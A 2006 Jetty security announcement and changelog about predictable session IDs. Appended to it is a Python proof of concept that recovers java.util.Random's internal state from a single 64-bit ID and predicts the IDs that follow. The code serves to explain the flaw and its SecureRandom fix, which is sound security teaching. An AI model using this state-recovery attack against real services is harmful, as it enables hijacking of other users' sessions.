Jetty releases 4.2.27, 5.1.12, 6.0.2 and 6.1.0pre3
Greg Wilkins <gregw <at> webtide.com>
2006-11-23 18:35:47 GMT
All,
new releases of all branches of Jetty are now available to address a
security vulnerability that was brought to our attention.
Because Jetty's session manager was using a 64 bit random number
from a 48 bit random source, there were some bits of internal state
leaked in a session ID. Apparently this reduces the workload of
a brute force attack to predict session IDs. Jetty only adds
another 3 bits of environmental randomness to each session ID.
Predicting session IDs may be used by an attacker to interact with
another user's session.
This has been fixed in 4.2.27, 5.1.12, 6.0.2 and 6.1.0pre3
and it is highly recommended that you upgrade to one of these
releases. The new algorithm uses SecureRandom if available, which
provides a larger internal random state. More than 64 bits of
environmental randomness are added to each session ID.
There have been lots of other things added in these releases as
well - so if you want a minimal patch just take the
AbstractSessionManager class from the relevant release or
contact me for some support.
Jetty-4.2.27 - 22 November 2006
+ Upgraded session ID generation to use SecureRandom
+ AJP protected against bad requests from mod_jk
Jetty-5.1.12 - 22 November 2006
+ Added support for TLS_DHE_RSA_WITH_AES_256_CBC_SHA
+ Upgraded session ID generation to use SecureRandom
+ Quote single quotes in cookies
+ AJP protected against bad requests from mod_jk
+ JETTY-154 Cookies ignore single quotes
jetty-6.0.2 - 22 November 2006
+ Moved all modules updates from 6.1pre2 to 6.0
+ Added concept of buffered endpoint
+ Added conversion Object -> ObjectName for the result of method
calls made on MBeans
+ Added DataFilter configuration to cometd
+ added examples/test-jaas-webapp
+ Added extraClassPath to WebAppContext
+ Added hierarchical destroy of mbeans
+ Added ID constructor to AbstractSessionManager.Session
+ added isStopped() in LifeCycle and AbstractLifeCycle
+ Added override descriptor for deployment of RO webapps
+ add <Property> replacement in jetty xml config files
+ alternate optimizations of writer (use -Dbuffer.writers=true)
+ Allow session cookie to be refreshed
+ Apply queryEncoding to getQueryString
+ CGI example in test webapp
+ change examples/test-jndi-webapp so it can be regularly built
+ Default soLinger is -1 (disabled)
+ ensure "" returned for ServletContext.getContextPath() for
root context
+ ensure sessions nulled out on request recycle; ensure session
null after invalidate
+ ensure setContextPath() works when invoked from jetty-web.xml
+ fixed NIO endpoint flush. Avoid duplicate sends
+ Fixed NPE in bio.SocketEndPoint.getRemoteAddr()
+ Fixed resource cache flushing
+ Fixed tld parsing for maven plugin
+ HttpGenerator can generate requests
+ Improved *-mbean.properties files and specialized some MBean
+ JETTY-118 ignore extra content after close.
+ JETTY-119 cleaned up Security optimization
+ JETTY-123 handle windows UNC paths
+ JETTY-126 handle content > Integer.MAX_VALUE
+ JETTY-129 ServletContextListeners called after servlets are
initialized
+ JETTY-151 Idle timeout only applies to blocking operations
+ JETTY-151 refactored writers
+ JETTY-154 Cookies are double quotes only
+ JETTY-171 Fixed filter mapping
+ JETTY-172 use getName() instead of toString
+ JETTY-173 restore servletpath after dispatch
+ Major refactor of SelectChannel EndPoint for client selector
+ make .tag files work in packed wars
+ Plugin shutdown context before stopping it.
+ Refactored session lifecycle and additional tests
+ release resource lookup in Default servlet
+ (re)make JAAS classes available to webapp classloader
+ Reverted UnixCrypt to use coercions (that affected results)
+ Session IDs can change worker ID
+ Simplified ResourceCache and Default servlet
+ SocketConnector closes all connections in doStop
+ Upgraded session ID generation to use SecureRandom
+ updated glassfish jasper to tag SJSAS-9_1-B25-EA-08_Nov_2006
+ Support TLS_DHE_RSA_WITH_AES_256_CBC_SHA
jetty-6.1.0pre3 - 22 November 2006
+ fixed NIO endpoint flush. Avoid duplicate sends
+ Upgraded session ID generation to use SecureRandom
+ updated glassfish jasper to tag SJSAS-9_1-B25-EA-08_Nov_2006
+ Support TLS_DHE_RSA_WITH_AES_256_CBC_SHA
+ JETTY-180 xbean for context deployer
+ JETTY-154 Cookies are double quotes only
+ Expose isResumed on Continuations
+ Refactored AJP generator
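The announcement says a 64 bit ID was drawn from a 48 bit random source, and that this lets an attacker predict further IDs. The example below, added here and not part of the original message or of Jetty's code, shows concretely why. It assumes the 48 bit source was java.util.Random (a 48 bit linear congruential generator whose nextLong() is just two consecutive 32 bit outputs glued together; the mail does not name the class, so that is an assumption). Observing one raw nextLong() reveals the top 32 bits of the generator state twice, so only the 16 hidden bits of the 48 bit state are left to brute force, and every later ID follows. The extra 3 bits of environmental randomness mentioned in the mail are not modelled; they would multiply that 2^16 search by a small constant at most. The secure_session_id function is the Python analogue of the SecureRandom fix, not Jetty's implementation.

```python
"""Why one 64-bit value from java.util.Random leaks the generator state.

Re-implements java.util.Random bit-for-bit (48-bit LCG, as specified in the
Java docs), recovers the hidden state from a single nextLong() output, and
predicts the values that follow.  Added illustration, not Jetty code.
"""
import secrets

MULT = 0x5DEECE66D            # java.util.Random multiplier
ADD = 0xB                      # java.util.Random increment
MASK = (1 << 48) - 1           # the generator keeps only 48 bits of state


def _signed32(x):
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x >= (1 << 31) else x


def _signed64(x):
    x &= 0xFFFFFFFFFFFFFFFF
    return x - (1 << 64) if x >= (1 << 63) else x


class JavaRandom:
    """Bit-exact model of java.util.Random (seeded, or resumed from a state)."""

    def __init__(self, seed=0, state=None):
        if state is not None:
            self.state = state & MASK           # resume from a recovered state
        else:
            self.state = (seed ^ MULT) & MASK   # Java's initial scramble

    def next_bits(self, bits):
        self.state = (self.state * MULT + ADD) & MASK
        return self.state >> (48 - bits)

    def next_long(self):
        # Java: ((long) next(32) << 32) + next(32); both halves are signed ints
        hi = _signed32(self.next_bits(32))
        lo = _signed32(self.next_bits(32))
        return _signed64((hi << 32) + lo)


def split_long(value):
    """Undo nextLong()'s signed arithmetic: the two unsigned 32-bit outputs."""
    v = value & 0xFFFFFFFFFFFFFFFF
    lo = v & 0xFFFFFFFF
    hi = ((v - _signed32(lo)) >> 32) & 0xFFFFFFFF
    return hi, lo


def recover_states(observed_long):
    """Brute-force the 16 bits that nextLong() does not expose.

    Returns every 48-bit state (after the second next(32)) consistent with the
    observed value; in practice this is a single candidate.
    """
    hi, lo = split_long(observed_long)
    candidates = []
    for low16 in range(1 << 16):                 # only 65536 possibilities
        state_a = (hi << 16) | low16             # state after the first next(32)
        state_b = (state_a * MULT + ADD) & MASK  # state after the second
        if state_b >> 16 == lo:
            candidates.append(state_b)
    return candidates


def predict_next_longs(observed_long, count):
    """One list of predicted nextLong() values per consistent state."""
    predictions = []
    for state in recover_states(observed_long):
        clone = JavaRandom(state=state)
        predictions.append([clone.next_long() for _ in range(count)])
    return predictions


def secure_session_id(nbytes=16):
    """Shape of the fix: an OS-backed CSPRNG (Python's analogue of SecureRandom).

    128 bits of unpredictable output and no recoverable internal state.
    """
    return secrets.token_hex(nbytes)


if __name__ == "__main__":
    # Constructed scenario: the server seed is unknown to the attacker, who
    # sees exactly one session ID and wants the next three.
    victim = JavaRandom(seed=0x1234ABCD)
    leaked = victim.next_long()
    print("observed ID:", hex(leaked & 0xFFFFFFFFFFFFFFFF))
    for guess in predict_next_longs(leaked, 3):
        print("predicted:  ", [hex(g & 0xFFFFFFFFFFFFFFFF) for g in guess])
    print("actual:     ", [hex(victim.next_long() & 0xFFFFFFFFFFFFFFFF) for _ in range(3)])
    print("secure ID:  ", secure_session_id())
```

The search loop is the whole attack: 65536 multiplications, well under a second in Python. Mixing a few bits of timing or address entropy into the ID raises the cost only by the number of values those bits can take, which is why the fix had to change the generator rather than add more mixing.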